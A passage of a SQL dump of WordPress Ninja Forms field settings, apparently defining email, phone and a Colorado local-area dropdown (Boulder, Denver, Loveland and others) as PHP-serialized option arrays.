sc','0'),(403,8,'desc_pos','none','desc_pos','none'),(404,8,'desc_text','','desc_text',''),(405,8,'element_class','','element_class',''),(406,8,'required','1','required','1'),(407,8,'key','email_144','key','email_144'),(408,8,'default','','default',''),(409,8,'container_class','one-half first','container_class','one-half first'),(410,8,'parent_id','2','parent_id','2'),(411,9,'objectType','Field','objectType','Field'),(412,9,'objectDomain','fields','objectDomain','fields'),(413,9,'editActive','','editActive',''),(414,9,'order','5','order','5'),(415,9,'type','phone','type','phone'),(416,9,'def_id','15','def_id','15'),(417,9,'label','Phone','label','Phone'),(418,9,'label_pos','above','label_pos','above'),(419,9,'mask','(999) 999-9999','mask','(999) 999-9999'),(420,9,'datepicker','0','datepicker','0'),(421,9,'first_name','0','first_name','0'),(422,9,'last_name','0','last_name','0'),(423,9,'from_name','0','from_name','0'),(424,9,'user_address_1','0','user_address_1','0'),(425,9,'user_address_2','0','user_address_2','0'),(426,9,'user_city','0','user_city','0'),(427,9,'user_zip','0','user_zip','0'),(428,9,'user_email','0','user_email','0'),(429,9,'user_info_field_group','1','user_info_field_group','1'),(430,9,'show_help','0','show_help','0'),(431,9,'help_text','','help_text',''),(432,9,'calc_auto_include','0','calc_auto_include','0'),(433,9,'calc_option','0','calc_option','0'),(434,9,'placeholder','','placeholder',''),(435,9,'disable_input','0','disable_input','0'),(436,9,'input_limit','','input_limit',''),(437,9,'input_limit_type','char','input_limit_type','char'),(438,9,'input_limit_msg','','input_limit_msg',''),(439,9,'user_state','0','user_state','0'),(440,9,'autocomplete_off','0','autocomplete_off','0'),(441,9,'num_sort','0','num_sort','0'),(442,9,'admin_label','','admin_label',''),(443,9,'user_info_field_group_name','','user_info_field_group_name',''),(444,9,'user_info_field_group_custom','','user_info_field_group_custom',''),(445,9,'show_desc','0','show_desc','0'),(446,9,'desc_pos','none','desc_pos','none'),(447,9,'desc_text','','desc_text',''),(448,9,'element_class','','element_class',''),(449,9,'required','1','required','1'),(450,9,'key','phone_145','key','phone_145'),(451,9,'default','','default',''),(452,9,'container_class','one-half','container_class','one-half'),(453,9,'manual_key','','manual_key',''),(454,9,'custom_mask','','custom_mask',''),(455,9,'parent_id','2','parent_id','2'),(456,10,'objectType','Field','objectType','Field'),(457,10,'objectDomain','fields','objectDomain','fields'),(458,10,'editActive','','editActive',''),(459,10,'order','6','order','6'),(460,10,'type','listselect','type','listselect'),(461,10,'label','Your Local Area','label','Your Local Area'),(462,10,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(463,10,'label_pos','above','label_pos','above'),(464,10,'list_type','dropdown','list_type','dropdown'),(465,10,'multi_size','5','multi_size','5'),(466,10,'list_show_value','1','list_show_value','1'),(467,10,'list','a:0:{}','list','a:0:{}'),(468,10,'user_info_field_group','','user_info_field_group',''),(469,10,'calc_auto_include','0','calc_auto_include','0'),(470,10,'user_state','0','user_state','0'),(471,10,'num_sort','0','num_sort','0'),(472,10,'admin_label','','admin_label',''),(473,10,'show_help','0','show_help','0'),(474,10,'help_text','','help_text',''),(475,10,'show_desc','0','show_desc','0'),(476,10,'desc_pos','none','desc_pos','none'),(477,10,'desc_text','','desc_text',''),(478,10,'element_class','','element_class',''),(479,10,'required','1','required','1'),(480,10,'options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 